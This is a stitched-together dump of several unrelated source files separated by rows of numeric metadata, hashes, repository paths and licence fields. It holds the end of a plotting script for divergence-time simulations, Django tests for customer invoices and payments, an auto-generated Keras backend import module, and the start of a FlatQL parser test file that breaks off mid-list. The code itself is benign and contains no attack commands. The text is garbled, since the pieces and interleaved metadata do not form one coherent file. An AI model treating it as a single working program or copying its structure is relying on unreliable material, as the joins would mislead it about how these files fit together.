                **common)
        for loci in ("100k", "500k"):
            generate_scatter_plots(
                    plot_file_prefix = "linkage-{0}-{1}".format(loci, prefix),
                    linked_loci = loci,
                    **common)
        if with_no_vo:
            generate_scatter_plots(
                    plot_file_prefix = "linkage-500k-{0}-no-vo".format(prefix),
                    linked_loci = "500k",
                    include_variable_only = False,
                    **common)
        generate_scatter_plots(
                plot_file_prefix = "missing-data-{0}".format(prefix),
                linked_loci = None,
                missing_data = True,
                **common)
        generate_scatter_plots(
                plot_file_prefix = "filtered-data-{0}".format(prefix),
                linked_loci = None,
                missing_data = False,
                filtered_data = True,
                **common)
        generate_root_1000_500k_scatter_plots(
                parameters = params,
                parameter_label = label,
                parameter_symbol = symbol,
                plot_file_prefix = prefix)
    # Model plots: every data condition is plotted twice, once with the
    # default model set and once with show_all_models turned on.
    model_conditions = [
        dict(),
        dict(linked_loci = "100k"),
        dict(linked_loci = "500k"),
        dict(linked_loci = "500k", include_variable_only = False),
        dict(linked_loci = None, missing_data = True),
        dict(linked_loci = None, missing_data = False, filtered_data = True),
    ]
    for extra in model_conditions:
        for show_all in (False, True):
            kwargs = dict(extra)
            if show_all:
                kwargs["show_all_models"] = True
            generate_model_plots(
                    number_of_comparisons = 3,
                    include_all_sizes_fixed = True,
                    include_root_size_fixed = False,
                    **kwargs)
    generate_root_1000_500k_model_plots(
            number_of_comparisons = 3)
    # Histograms of the number of variable sites.  The two unlinked
    # plots draw different rows of the same grid; the linked-loci plots
    # take the default rows.
    n_var_common = dict(
            parameters = [
                "n_var_sites_c1",
                "n_var_sites_c2",
                "n_var_sites_c3",
            ],
            parameter_label = "Number of variable sites",
            parameter_discrete = True,
            range_key = "range",
            number_of_digits = 0,
            include_all_sizes_fixed = True,
            include_root_size_fixed = False,
            include_variable_only = False)
    generate_histograms(
            plot_file_prefix = "number-of-variable-sites-500k",
            row_indices = [0],
            **n_var_common)
    generate_histograms(
            plot_file_prefix = "number-of-variable-sites-100k",
            row_indices = [1],
            **n_var_common)
    for loci in ("100k", "500k"):
        generate_histograms(
                plot_file_prefix = "linkage-{0}-number-of-variable-sites".format(
                        loci),
                linked_loci = loci,
                **n_var_common)
    # Convergence diagnostics (ESS, then PSRF), each for the unlinked
    # and both linked-loci conditions.
    _generate_convergence_histograms(
            parameters = [
                "ess_sum_ln_likelihood",
            ],
            parameter_label = "Effective sample size of log likelihood",
            plot_file_prefix = "ess-ln-likelihood",
            number_of_digits = 0,
            include_all_sizes_fixed = True)
    _generate_convergence_histograms(
            parameters = [
                "ess_sum_root_height_c1sp1",
                "ess_sum_root_height_c2sp1",
                "ess_sum_root_height_c3sp1",
            ],
            parameter_label = "Effective sample size of divergence time",
            plot_file_prefix = "ess-div-time",
            number_of_digits = 0,
            include_all_sizes_fixed = True)
    _generate_convergence_histograms(
            parameters = [
                "ess_sum_pop_size_root_c1sp1",
                "ess_sum_pop_size_root_c2sp1",
                "ess_sum_pop_size_root_c3sp1",
            ],
            parameter_label = "Effective sample size of root population size",
            plot_file_prefix = "ess-root-pop-size",
            number_of_digits = 0,
            include_all_sizes_fixed = False)
    _generate_convergence_histograms(
            parameters = [
                "psrf_ln_likelihood",
            ],
            parameter_label = "PSRF of log likelihood",
            plot_file_prefix = "psrf-ln-likelihood",
            number_of_digits = 3,
            include_all_sizes_fixed = True)
    _generate_convergence_histograms(
            parameters = [
                "psrf_root_height_c1sp1",
                "psrf_root_height_c2sp1",
                "psrf_root_height_c3sp1",
            ],
            parameter_label = "PSRF of divergence time",
            plot_file_prefix = "psrf-div-time",
            number_of_digits = 3,
            include_all_sizes_fixed = True)
    plot_ess_versus_error(
            parameters = [
                "root_height_c1sp1",
                "root_height_c2sp1",
                "root_height_c3sp1",
            ],
            parameter_label = "divergence time",
            plot_file_prefix = "div-time",
            include_all_sizes_fixed = True,
            include_root_size_fixed = False)
    generate_bake_off_plots(
            number_of_pairs = 3,
            number_of_sims = 500,
            posterior_sample_size = 2000,
            prior_sample_size = 500000)
    # Estimated-vs-true probability of one divergence event, for the
    # unlinked 100k-site data and both linked-loci simulation dirs.
    plot_nevents_estimated_vs_true_probs(
            nevents = 1,
            sim_dir = "03pairs-dpp-root-0100-100k",
            nbins = 5,
            plot_file_prefix = "100k-sites")
    for loci_suffix, prefix in (
            ("0100l", "linkage-100-100k-sites"),
            ("0500l", "linkage-500-100k-sites")):
        plot_nevents_estimated_vs_true_probs(
                nevents = 1,
                sim_dir = "03pairs-dpp-root-0100-100k-{0}".format(loci_suffix),
                nbins = 5,
                plot_file_prefix = prefix,
                include_unlinked_only = True)


if __name__ == "__main__":
    main_cli()
| 41.908104
| 122
| 0.520666
| 16,745
| 150,492
| 4.383756
| 0.033503
| 0.011116
| 0.012969
| 0.017165
| 0.886848
| 0.863322
| 0.844917
| 0.831867
| 0.817454
| 0.79691
| 0
| 0.031216
| 0.372458
| 150,492
| 3,590
| 123
| 41.919777
| 0.746061
| 0.034673
| 0
| 0.788001
| 0
| 0.00373
| 0.103002
| 0.02922
| 0
| 0
| 0
| 0
| 0.020827
| 1
| 0.008082
| false
| 0.000622
| 0.003419
| 0
| 0.017097
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f1425d9038b7ef5c9a403dea3a7ddc3422d3eaac
| 19,805
|
py
|
Python
|
backend/customer_invoicing/tests.py
|
StichtingIAPC/swipe
|
d1ea35a40813d2d5e9cf9edde33148c0a825efc4
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
backend/customer_invoicing/tests.py
|
StichtingIAPC/swipe
|
d1ea35a40813d2d5e9cf9edde33148c0a825efc4
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
backend/customer_invoicing/tests.py
|
StichtingIAPC/swipe
|
d1ea35a40813d2d5e9cf9edde33148c0a825efc4
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
from django.test import TestCase
from tools.testing import TestData
from sales.models import Transaction, SalesTransactionLine, Payment, IncorrectDataException
from money.models import Money, Price, Currency
from customer_invoicing.models import ReceiptCustInvoice, CustInvoice, CustomCustInvoice, CustomInvoiceLine, \
CustPayment, InvoiceFieldPerson, InvoiceFieldOrganisation
from crm.models import PersonTypeField, PersonTypeFieldValue, PersonType, OrganisationTypeField, \
OrganisationTypeFieldValue, OrganisationType
from decimal import Decimal
from swipe.settings import USED_CURRENCY
# noinspection PyTypeChecker
class CustInvoiceTestReceiptInvoice(TestCase, TestData):
    """Receipt-backed customer invoices created from sales transactions."""

    def setUp(self):
        self.setup_base_data()

    def _prepare_sale(self):
        # Push an order through the supplier/packing pipeline so the
        # articles are in stock, and return the customer order.
        order = self.create_custorders()
        self.create_suporders()
        self.create_packingdocuments()
        return order

    def _standard_line(self, order, count):
        # A sales line for articletype_1 at the system-currency price,
        # together with the matching total as Money.
        line = SalesTransactionLine(price=self.price_system_currency_1,
                                    count=count, order=order.pk,
                                    article=self.articletype_1)
        total = Money(amount=self.price_system_currency_1.amount * count,
                      currency=self.price_system_currency_1.currency)
        return line, total

    def test_create_invoice_without_customer(self):
        order = self._prepare_sale()
        # Open the invoice register so invoice payments are accepted.
        self.register_4.open(counted_amount=Decimal(0))
        line, total = self._standard_line(order, 3)
        payment = Payment(amount=total, payment_type=self.paymenttype_invoice)
        # Invoicing without a customer to bill must be rejected.
        with self.assertRaises(IncorrectDataException):
            Transaction.create_transaction(user=self.user_1,
                                           transaction_lines=[line],
                                           payments=[payment],
                                           customer=None)

    def test_create_invoice_from_transaction_all_invoiced(self):
        order = self._prepare_sale()
        # Open the invoice register.
        self.register_4.open(counted_amount=Decimal(0))
        line, total = self._standard_line(order, 3)
        payment = Payment(amount=total, payment_type=self.paymenttype_invoice)
        Transaction.create_transaction(user=self.user_1,
                                       transaction_lines=[line],
                                       payments=[payment],
                                       customer=self.customer_person_1)
        trans = Transaction.objects.get()
        self.assertEqual(len(CustInvoice.objects.all()), 1)
        invoice = ReceiptCustInvoice.objects.get()
        # The invoice tracks the receipt, owes the full total, and has
        # received no payments yet.
        self.assertEqual(invoice.receipt, trans)
        self.assertEqual(invoice.paid,
                         Money(amount=Decimal(0),
                               currency=self.currency_current))
        self.assertEqual(invoice.to_be_paid, total)
        self.assertFalse(invoice.handled)

    def test_create_invoice_no_invoicing(self):
        order = self._prepare_sale()
        # Open both the maestro and the invoice register.
        self.register_3.open(counted_amount=Decimal(0))
        self.register_4.open(counted_amount=Decimal(0))
        line, total = self._standard_line(order, 1)
        # Paying entirely by maestro should not create any invoice.
        payment = Payment(amount=total, payment_type=self.paymenttype_maestro)
        Transaction.create_transaction(user=self.user_1,
                                       transaction_lines=[line],
                                       payments=[payment],
                                       customer=self.customer_person_1)
        self.assertFalse(CustInvoice.objects.exists())

    def test_create_invoice_mixed_invoice_and_straight_payment(self):
        order = self._prepare_sale()
        # Open both the maestro and the invoice register.
        self.register_3.open(counted_amount=Decimal(0))
        self.register_4.open(counted_amount=Decimal(0))
        sale_price = Price(amount=Decimal("3"),
                           currency=self.currency_current, vat=1)
        line = SalesTransactionLine(price=sale_price, count=1,
                                    order=order.id,
                                    article=self.articletype_1)
        direct_part = Payment(
            amount=Money(amount=Decimal("1"),
                         currency=self.price_system_currency_1.currency),
            payment_type=self.paymenttype_maestro)
        invoiced_part = Payment(
            amount=Money(amount=Decimal("2"),
                         currency=self.price_system_currency_1.currency),
            payment_type=self.paymenttype_invoice)
        Transaction.create_transaction(user=self.user_1,
                                       transaction_lines=[line],
                                       payments=[direct_part, invoiced_part],
                                       customer=self.customer_person_1)
        trans = Transaction.objects.get()
        self.assertEqual(len(CustInvoice.objects.all()), 1)
        invoice = ReceiptCustInvoice.objects.get()
        self.assertEqual(invoice.receipt, trans)
        # The maestro part counts as already paid; the full sale price
        # is what must eventually be settled.
        self.assertEqual(invoice.paid,
                         Money(amount=Decimal("1"),
                               currency=self.currency_current))
        self.assertEqual(invoice.to_be_paid,
                         Money(amount=Decimal("3"),
                               currency=self.currency_current))
        self.assertFalse(invoice.handled)
class CustInvoiceTestCustomInvoice(TestCase, TestData):
    """Custom (free-form) customer invoices built from text/price lines."""

    def setUp(self):
        self.setup_base_data()

    def test_create_custom_invoice(self):
        # NOTE(review): `price_systen_currency_2` [sic] is the attribute
        # name supplied by TestData; the typo cannot be fixed here.
        invoice_lines = [["USB kabels", self.price_system_currency_1],
                         ["Poolse schoonmaakmiddelen", self.price_systen_currency_2]]
        CustomCustInvoice.create_custom_invoice(invoice_name="Jaap de Steen", invoice_address="Hallenweg 5",
                                                invoice_zip_code="7522NB", invoice_city="Enschede",
                                                invoice_country="Nederland",
                                                invoice_email_address="bestuuur@iapc.utwente.nl",
                                                text_price_combinations=invoice_lines,
                                                user=self.user_1)
        self.assertEqual(len(CustInvoice.objects.all()), 1)
        custom_invoice = CustomCustInvoice.objects.get()
        # Nothing paid yet; the amount owed is the sum of both lines.
        self.assertEqual(custom_invoice.paid, Money(amount=Decimal("0"), currency=self.currency_current))
        self.assertEqual(custom_invoice.to_be_paid, Money(amount=self.price_system_currency_1.amount + self.price_systen_currency_2.amount,
                                                          currency=self.currency_current))
        self.assertFalse(custom_invoice.handled)
        custom_invoice_lines = CustomInvoiceLine.objects.all()
        self.assertEqual(len(custom_invoice_lines), 2)
        # Line order in the queryset is not guaranteed, so accept either
        # ordering of the two prices.
        # Fixed: was the deprecated `assertEquals` alias (removed in
        # Python 3.12); use `assertEqual`.
        if custom_invoice_lines[0].price.amount == self.price_system_currency_1.amount:
            self.assertTrue(custom_invoice_lines[1].price.amount == self.price_systen_currency_2.amount)
        else:
            self.assertEqual(custom_invoice_lines[0].price.amount, self.price_systen_currency_2.amount)
            self.assertEqual(custom_invoice_lines[1].price.amount, self.price_system_currency_1.amount)
        for line in custom_invoice_lines:
            self.assertEqual(line.custom_invoice, custom_invoice)

    def test_create_custom_invoice_free(self):
        # An invoice whose only line costs nothing is immediately handled.
        price = Price(amount=Decimal(0), currency=self.currency_eur, vat=1)
        invoice_lines = [["Poolse schoonmaakmiddelen", price]]
        CustomCustInvoice.create_custom_invoice(invoice_name="Jaap de Steen", invoice_address="Hallenweg 5",
                                                invoice_zip_code="7522NB", invoice_city="Enschede",
                                                invoice_country="Nederland",
                                                invoice_email_address="bestuuur@iapc.utwente.nl",
                                                text_price_combinations=invoice_lines,
                                                user=self.user_1)
        self.assertEqual(len(CustInvoice.objects.all()), 1)
        custom_invoice = CustomCustInvoice.objects.get()
        self.assertTrue(custom_invoice.handled)
# noinspection PyTypeChecker
class CustInvoicePayments(TestCase, TestData):
    """Paying off customer invoices, fully and in parts."""

    def setUp(self):
        self.setup_base_data()
        self.current_currency = Currency(USED_CURRENCY)

    def _invoice_simple_sale(self):
        # Sell one articletype_1 entirely on invoice and return the
        # resulting (unpaid) receipt invoice.
        order = self.create_custorders()
        self.create_suporders()
        self.create_packingdocuments()
        # Open the invoice register.
        self.register_4.open(counted_amount=Decimal(0))
        line = SalesTransactionLine(price=self.price_system_currency_1,
                                    count=1, order=order.id,
                                    article=self.articletype_1)
        total = Money(amount=self.price_system_currency_1.amount,
                      currency=self.price_system_currency_1.currency)
        payment = Payment(amount=total,
                          payment_type=self.paymenttype_invoice)
        Transaction.create_transaction(user=self.user_1,
                                       transaction_lines=[line],
                                       payments=[payment],
                                       customer=self.customer_person_1)
        return ReceiptCustInvoice.objects.get()

    def test_payment_all_invoiced_all_paid(self):
        invoice = self._invoice_simple_sale()
        self.assertFalse(invoice.handled)
        # Settling the full amount marks the invoice handled.
        invoice.pay(Money(amount=self.price_system_currency_1.amount,
                          currency=self.current_currency), self.user_1)
        self.assertTrue(invoice.handled)

    def test_payments_all_invoice_partial_payment_too_little(self):
        invoice = self._invoice_simple_sale()
        self.assertFalse(invoice.handled)
        # Underpaying leaves the invoice open.
        invoice.pay(Money(amount=Decimal("1"),
                          currency=self.current_currency), self.user_1)
        self.assertFalse(invoice.handled)

    def test_payments_all_invoice_partial_payment_too_much(self):
        invoice = self._invoice_simple_sale()
        self.assertFalse(invoice.handled)
        # Overpaying also leaves the invoice open (amounts must match).
        invoice.pay(Money(amount=Decimal("2"),
                          currency=self.current_currency), self.user_1)
        self.assertFalse(invoice.handled)

    def test_payments_partial_invoice(self):
        order = self.create_custorders()
        self.create_suporders()
        self.create_packingdocuments()
        # Open both the maestro and the invoice register.
        self.register_3.open(counted_amount=Decimal(0))
        self.register_4.open(counted_amount=Decimal(0))
        sale_price = Price(amount=Decimal("3"),
                           currency=self.currency_current, vat=1)
        line = SalesTransactionLine(price=sale_price, count=1,
                                    order=order.id,
                                    article=self.articletype_1)
        direct_amount = Money(amount=Decimal("1"),
                              currency=self.current_currency)
        invoiced_amount = Money(amount=Decimal("2"),
                                currency=self.current_currency)
        Transaction.create_transaction(
            user=self.user_1, transaction_lines=[line],
            payments=[Payment(amount=direct_amount,
                              payment_type=self.paymenttype_maestro),
                      Payment(amount=invoiced_amount,
                              payment_type=self.paymenttype_invoice)],
            customer=self.customer_person_1)
        invoice = ReceiptCustInvoice.objects.get()
        self.assertFalse(invoice.handled)
        # Only the invoiced remainder needs to be paid off.
        invoice.pay(invoiced_amount, self.user_1)
        self.assertTrue(invoice.handled)

    def test_payments_two_payments(self):
        order = self.create_custorders()
        self.create_suporders()
        self.create_packingdocuments()
        # Open the invoice register.
        self.register_4.open(counted_amount=Decimal(0))
        sale_price = Price(amount=Decimal("2"),
                           currency=self.currency_current, vat=1)
        line = SalesTransactionLine(price=sale_price, count=1,
                                    order=order.id,
                                    article=self.articletype_1)
        invoiced_amount = Money(
            amount=Decimal("2"),
            currency=self.price_system_currency_1.currency)
        Transaction.create_transaction(
            user=self.user_1, transaction_lines=[line],
            payments=[Payment(amount=invoiced_amount,
                              payment_type=self.paymenttype_invoice)],
            customer=self.customer_person_1)
        invoice = ReceiptCustInvoice.objects.get()
        self.assertFalse(invoice.handled)
        # Two installments of 1 each: handled only after the second.
        invoice.pay(Money(amount=Decimal("1"),
                          currency=self.currency_current), self.user_1)
        self.assertFalse(invoice.handled)
        invoice.pay(Money(amount=Decimal("1"),
                          currency=self.currency_current), self.user_1)
        self.assertTrue(invoice.handled)
        self.assertEqual(len(CustPayment.objects.all()), 2)
class InvoiceFieldTests(TestCase, TestData):
def setUp(self):
self.setup_base_data()
def test_get_fields_for_customer_passes_through(self):
# Lots of experimental typefield data
ptf = PersonTypeField.objects.create(name="FooPersonTypeFieldName")
ptf2 = PersonTypeField.objects.create(name="BarPersonTypeFieldName")
pt = PersonType.objects.create(name="FooPersonTypeName")
pt.typefields.add(ptf)
pt.typefields.add(ptf2)
self.customer_person_1.types.add(pt)
ptfv = PersonTypeFieldValue(value="InvoiceName", typefield=ptf, type=pt, object=self.customer_person_1)
ptfv.save()
ptfv2 = PersonTypeFieldValue(value="InvoiceName", typefield=ptf2, type=pt, object=self.customer_person_1)
ptfv2.save()
# Create a receipt with relevant customer
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
SOLD = 1
# Invoice register
self.register_4.open(counted_amount=Decimal(0))
price = Price(amount=Decimal("2"), currency=self.currency_current, vat=1)
tl_1 = SalesTransactionLine(price=price, count=SOLD, order=order.id,
article=self.articletype_1)
money_1 = Money(amount=Decimal("2"), currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_invoice)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1],
customer=self.customer_person_1)
self.assertTrue(InvoiceFieldPerson.objects.get().is_dummy())
def test_get_fields_for_customers_person_sets_name(self):
ptf = PersonTypeField.objects.create(name="FooPersonTypeFieldName")
ptf2 = PersonTypeField.objects.create(name="BarPersonTypeFieldName")
ptf3 = PersonTypeField.objects.create(name="BazPersonTypeFieldCity")
pt = PersonType.objects.create(name="FooPersonTypeName")
pt.typefields.add(ptf)
pt.typefields.add(ptf2)
self.customer_person_1.types.add(pt)
VAR_NAME = "Magnus"
VAR_CITY = "Ulaan Bator"
ptfv = PersonTypeFieldValue(value=VAR_NAME, typefield=ptf, type=pt, object=self.customer_person_1)
ptfv.save()
ptfv2 = PersonTypeFieldValue(value="Irr data", typefield=ptf2, type=pt, object=self.customer_person_1)
ptfv2.save()
ptfv3 = PersonTypeFieldValue(value=VAR_CITY, typefield=ptf3, type=pt, object=self.customer_person_1)
ptfv3.save()
InvoiceFieldPerson.objects.create(name=ptf, city=ptf3)
# Some buying data
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
SOLD = 1
self.register_4.open(counted_amount=Decimal(0))
price = Price(amount=Decimal("2"), currency=self.currency_current, vat=1)
tl_1 = SalesTransactionLine(price=price, count=SOLD, order=order.id,
article=self.articletype_1)
money_1 = Money(amount=Decimal("2"), currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_invoice)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1],
customer=self.customer_person_1)
rec = ReceiptCustInvoice.objects.get()
self.assertEqual(rec.invoice_name, VAR_NAME)
self.assertEqual(rec.invoice_city, VAR_CITY)
def test_get_fields_for_customers_organisation_sets_name(self):
    """Same as the person variant above, but with organisation type fields."""
    # Three type fields: one mapped to the invoice name, one irrelevant,
    # one mapped to the invoice city.
    name_field = OrganisationTypeField.objects.create(name="FooPersonTypeFieldName")
    other_field = OrganisationTypeField.objects.create(name="BarPersonTypeFieldName")
    city_field = OrganisationTypeField.objects.create(name="BazPersonTypeFieldCity")
    org_type = OrganisationType.objects.create(name="FooPersonTypeName")
    org_type.typefields.add(name_field, other_field)
    self.organisation.types.add(org_type)
    expected_name = "Magnus"
    expected_city = "Ulaan Bator"
    for field, value in ((name_field, expected_name),
                         (other_field, "Irr data"),
                         (city_field, expected_city)):
        OrganisationTypeFieldValue(value=value, typefield=field, type=org_type,
                                   object=self.organisation).save()
    InvoiceFieldOrganisation.objects.create(name=name_field, city=city_field)
    # Some buying data
    order = self.create_custorders()
    self.create_suporders()
    self.create_packingdocuments()
    self.register_4.open(counted_amount=Decimal(0))
    price = Price(amount=Decimal("2"), currency=self.currency_current, vat=1)
    line = SalesTransactionLine(price=price, count=1, order=order.id,
                                article=self.articletype_1)
    payment = Payment(amount=Money(amount=Decimal("2"),
                                   currency=self.price_system_currency_1.currency),
                      payment_type=self.paymenttype_invoice)
    Transaction.create_transaction(user=self.user_1, transaction_lines=[line],
                                   payments=[payment],
                                   customer=self.customer_contact_organisation)
    receipt = ReceiptCustInvoice.objects.get()
    self.assertEqual(receipt.invoice_name, expected_name)
    self.assertEqual(receipt.invoice_city, expected_city)
| 54.709945
| 139
| 0.69235
| 2,261
| 19,805
| 5.797435
| 0.084918
| 0.037687
| 0.033186
| 0.050885
| 0.84437
| 0.816448
| 0.799359
| 0.788755
| 0.761215
| 0.735734
| 0
| 0.018039
| 0.213481
| 19,805
| 361
| 140
| 54.861496
| 0.823458
| 0.02151
| 0
| 0.703704
| 0
| 0
| 0.026966
| 0.011571
| 0
| 0
| 0
| 0
| 0.13468
| 1
| 0.060606
| false
| 0.003367
| 0.026936
| 0
| 0.10101
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f14569931cfd994f6e73b4959b1254ca180fc464
| 6,045
|
py
|
Python
|
venv/lib/python3.8/site-packages/keras/api/_v1/keras/backend/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | 1
|
2021-05-24T10:08:51.000Z
|
2021-05-24T10:08:51.000Z
|
venv/lib/python3.8/site-packages/keras/api/keras/backend/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/keras/api/keras/backend/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.keras.backend namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from keras.backend import _v1_name_scope as name_scope
from keras.backend import abs
from keras.backend import all
from keras.backend import any
from keras.backend import arange
from keras.backend import argmax
from keras.backend import argmin
from keras.backend import backend
from keras.backend import batch_dot
from keras.backend import batch_flatten
from keras.backend import batch_get_value
from keras.backend import batch_normalization
from keras.backend import batch_set_value
from keras.backend import bias_add
from keras.backend import binary_crossentropy
from keras.backend import cast
from keras.backend import cast_to_floatx
from keras.backend import categorical_crossentropy
from keras.backend import clear_session
from keras.backend import clip
from keras.backend import concatenate
from keras.backend import constant
from keras.backend import conv1d
from keras.backend import conv2d
from keras.backend import conv2d_transpose
from keras.backend import conv3d
from keras.backend import cos
from keras.backend import count_params
from keras.backend import ctc_batch_cost
from keras.backend import ctc_decode
from keras.backend import ctc_label_dense_to_sparse
from keras.backend import cumprod
from keras.backend import cumsum
from keras.backend import depthwise_conv2d
from keras.backend import dot
from keras.backend import dropout
from keras.backend import dtype
from keras.backend import elu
from keras.backend import equal
from keras.backend import eval
from keras.backend import exp
from keras.backend import expand_dims
from keras.backend import eye
from keras.backend import flatten
from keras.backend import foldl
from keras.backend import foldr
from keras.backend import function
from keras.backend import gather
from keras.backend import get_session
from keras.backend import get_uid
from keras.backend import get_value
from keras.backend import gradients
from keras.backend import greater
from keras.backend import greater_equal
from keras.backend import hard_sigmoid
from keras.backend import in_test_phase
from keras.backend import in_top_k
from keras.backend import in_train_phase
from keras.backend import int_shape
from keras.backend import is_keras_tensor
from keras.backend import is_sparse
from keras.backend import l2_normalize
from keras.backend import learning_phase
from keras.backend import learning_phase_scope
from keras.backend import less
from keras.backend import less_equal
from keras.backend import local_conv1d
from keras.backend import local_conv2d
from keras.backend import log
from keras.backend import manual_variable_initialization
from keras.backend import map_fn
from keras.backend import max
from keras.backend import maximum
from keras.backend import mean
from keras.backend import min
from keras.backend import minimum
from keras.backend import moving_average_update
from keras.backend import ndim
from keras.backend import normalize_batch_in_training
from keras.backend import not_equal
from keras.backend import one_hot
from keras.backend import ones
from keras.backend import ones_like
from keras.backend import permute_dimensions
from keras.backend import placeholder
from keras.backend import pool2d
from keras.backend import pool3d
from keras.backend import pow
from keras.backend import print_tensor
from keras.backend import prod
from keras.backend import random_bernoulli
from keras.backend import random_binomial
from keras.backend import random_normal
from keras.backend import random_normal_variable
from keras.backend import random_uniform
from keras.backend import random_uniform_variable
from keras.backend import relu
from keras.backend import repeat
from keras.backend import repeat_elements
from keras.backend import reset_uids
from keras.backend import reshape
from keras.backend import resize_images
from keras.backend import resize_volumes
from keras.backend import reverse
from keras.backend import rnn
from keras.backend import round
from keras.backend import separable_conv2d
from keras.backend import set_learning_phase
from keras.backend import set_session
from keras.backend import set_value
from keras.backend import shape
from keras.backend import sigmoid
from keras.backend import sign
from keras.backend import sin
from keras.backend import softmax
from keras.backend import softplus
from keras.backend import softsign
from keras.backend import sparse_categorical_crossentropy
from keras.backend import spatial_2d_padding
from keras.backend import spatial_3d_padding
from keras.backend import sqrt
from keras.backend import square
from keras.backend import squeeze
from keras.backend import stack
from keras.backend import std
from keras.backend import stop_gradient
from keras.backend import sum
from keras.backend import switch
from keras.backend import tanh
from keras.backend import temporal_padding
from keras.backend import tile
from keras.backend import to_dense
from keras.backend import transpose
from keras.backend import truncated_normal
from keras.backend import update
from keras.backend import update_add
from keras.backend import update_sub
from keras.backend import var
from keras.backend import variable
from keras.backend import zeros
from keras.backend import zeros_like
from keras.backend_config import epsilon
from keras.backend_config import floatx
from keras.backend_config import image_data_format
from keras.backend_config import set_epsilon
from keras.backend_config import set_floatx
from keras.backend_config import set_image_data_format
# Clean up the compatibility import, then replace this module in sys.modules
# with a TFModuleWrapper (deprecation=True) so attribute access goes through
# TensorFlow's module-wrapping machinery.
del _print_function
from tensorflow.python.util import module_wrapper as _module_wrapper

# Only wrap once: skip if the module has already been replaced by a wrapper.
if not isinstance(_sys.modules[__name__], _module_wrapper.TFModuleWrapper):
  _sys.modules[__name__] = _module_wrapper.TFModuleWrapper(
      _sys.modules[__name__], "keras.backend", public_apis=None, deprecation=True,
      has_lite=False)
| 36.415663
| 82
| 0.858065
| 922
| 6,045
| 5.4718
| 0.212581
| 0.35441
| 0.466204
| 0.614866
| 0.512587
| 0.143905
| 0.019425
| 0.019425
| 0.019425
| 0
| 0
| 0.0026
| 0.109181
| 6,045
| 165
| 83
| 36.636364
| 0.934262
| 0.027957
| 0
| 0
| 1
| 0
| 0.002215
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.967742
| 0
| 0.967742
| 0.019355
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f16a496e8dfe452b1cf2e5c2aa75e8201dab53d3
| 30,102
|
py
|
Python
|
tests/test_flatql_parser.py
|
Agile-Data/flat-ql
|
3212ae9d0ec4ba822c065bb5e4beccf9e936971b
|
[
"MIT"
] | 3
|
2022-03-21T05:03:39.000Z
|
2022-03-23T01:32:51.000Z
|
tests/test_flatql_parser.py
|
Agile-Data/flat-ql
|
3212ae9d0ec4ba822c065bb5e4beccf9e936971b
|
[
"MIT"
] | null | null | null |
tests/test_flatql_parser.py
|
Agile-Data/flat-ql
|
3212ae9d0ec4ba822c065bb5e4beccf9e936971b
|
[
"MIT"
] | null | null | null |
import pytest
from flatql.parser.ast import FlatQL, QualifiedName, FunctionCall, Comparison, Between, In, IsNull, \
Literal, Like, View, Column, Identifier, Table, BinaryExpression, ParenExpression, CaseExpression, \
LogicalExpression, ArrayLiteral
from flatql.parser.flatql_parser import parse_flatql, parse_qualified_name, parse_join_condition, \
parse_binary_expression
def test_simple_select_syntax():
    """Well-formed SELECT statements parse; malformed ones raise SyntaxError."""
    accepted = (
        "SELECT table.column FROM table_name",
        "SELECT table.column AS column_alias FROM table_name",
        "SELECT table.column AS \"column_alias\" FROM table_name",
        "SELECT table.column FROM \"select\"",
        "SELECT table.column, table.column FROM table_name",
        "SELECT table.column, table.column \n FROM table_name",
        "SELECT \"table\".\"integer\", table.column \n FROM table_name",
        "SELECT table.\"select\", table.column \n FROM table_name",
        "SELECT table.column, count(table.column) FROM table_name",
        "SELECT table.column, count(table.column) AS column_count FROM table_name",
        "SELECT table.column, count(table.column) AS \"column_count\" FROM table_name",
        "SELECT table.column, count_distinct(table.column) FROM table_name",
        "SELECT table.column, avg(table.column) FROM table_name",
        "SELECT table.column, sum(table.column) FROM table_name",
        "SELECT table.column, max(table.column) FROM table_name",
        "SELECT table.column, min(table.column) FROM table_name",
        "SELECT table.column, fun(table.column, table.column) FROM table_name",
        "SELECT table.column, fun(table.column, 10) FROM table_name",
        "SELECT table.column, fun(table.column, 10, 'a') FROM table_name",
        "SELECT table.column, count(table) FROM table_name",
        "SELECT table.column, count(\"table\") FROM table_name",
        "SELECT 1 + 1 FROM table_name",
